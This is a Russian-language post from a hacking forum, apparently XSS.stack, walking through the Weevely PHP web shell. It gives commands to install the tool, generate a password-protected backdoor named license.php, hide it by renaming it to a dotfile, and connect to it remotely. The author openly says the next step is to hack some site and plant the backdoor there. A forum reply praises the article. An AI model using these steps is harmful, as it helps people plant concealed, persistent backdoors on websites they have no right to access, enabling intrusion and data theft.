• XSS.stack #1 – первый литературный журнал от юзеров форума

Обзор вебшелла Weevely

tabac

CPU register
Пользователь
Регистрация
30.09.2018
Сообщения
1 610
Решения
1
Реакции
3 332
Weevely – это веб-шелл командной строки, динамически распространяемый по сети во время выполнения, предназначен для удалённого администрирования и тестирования на проникновение. Просто закиньте PHP скрипт, и программа обеспечит похожий на ssh терминал даже в ограниченном окружении.

Возможности:
  • Похожий на SSH терминал
  • Запуск SQL консоли, завёрнутой на цель
  • Пропуск HTTP трафика до цели через прокси
  • Аудит безопасности настройки хоста
  • Локальное монтирование целевой файловой системы
  • Проведение сетевых сканирований завёрнутых на цель
  • Выгрузка и загрузка файлов
  • Порождение обратного и прямого TCP шелла
  • Брут-форс внутренних служб
  • Управление сжатыми архивами
  • Агент бэкдора
Забрать его можно тут:


С инструментом познакомились, теперь будем устанавливать его.
В некоторых дистрибутивах Linux, он установлен. Поможем тем, у кого его нету.
Для начала, обновимся
Код:
apt-get update
Далее, устанавливаем необходимые пакеты и зависимости
Код:
sudo apt-get install g++ python-pip libyaml-dev python-dev
Код:
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade
Теперь качаем репозиторий с гитаба
Код:
git clone https://github.com/epinna/weevely3
После скачивания, переходим в ее папку и смотрим список файлов
Код:
cd weevely3 && ls
Видим питоновский скрипт инструмента weevely.py. Его и запускаем
Код:
python weevely.py
Как мы видим, у инструмента есть три команды.
  1. Подключиться к существующему бэкдору
  2. Восстановить существующую сессию подключения
  3. Сгенерировать новый бэкдор
Пока что, у нас нету на сервере бэкдора, поэтому, создадим новую папку и в нем сгенерируем новый бэкдор
Код:
mkdir backdoor
И генерируем
Код:
python2 weevely.py generate codeby backdoor/license.php
Видим что создался php скрипт, а точнее веб-шелл. Сделаем его не видимым для некоторых лиц, добавив в начале названия точку

Переходим в папку с бэкдором и переименовываем
Код:
mv license.php .license.php
К чему мы и стремились, при простом просмотре списка файлов с помощью команды ls, мы ничего не увидели. Однако если выполнить команду ls -la, мы увидим абсолютно все файлы в определенной директории.

Наш backdoor готов. Осталось хакнуть какой-то сайт и спрятать наш бэкдор там.


Для теста, подойдет локальный сервер. Загружаем скрипт на сервер и подключаемся к нему
Код:
python2 weevely.py http://site.ru/.license.php password1234
http://site.ru/.license.php - полный путь до бэкдора
password1234 - пароль для коннекта к бэкдору, который мы указывали при генерации

Код:
weevely> ls
Код:
inc
index.php
server.php

Готово! Вот мы законнектились к бэкдору.
 
python2 weevely.py generate codeby backdoor/license.php

password1234 - пароль для коннекта к бэкдору, который мы указывали при генерации

:smile12: статья зачет автор молодец.Такую классную статью написал.странно, что пароли пер**ались и что за странный пароль codeby :eek:
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх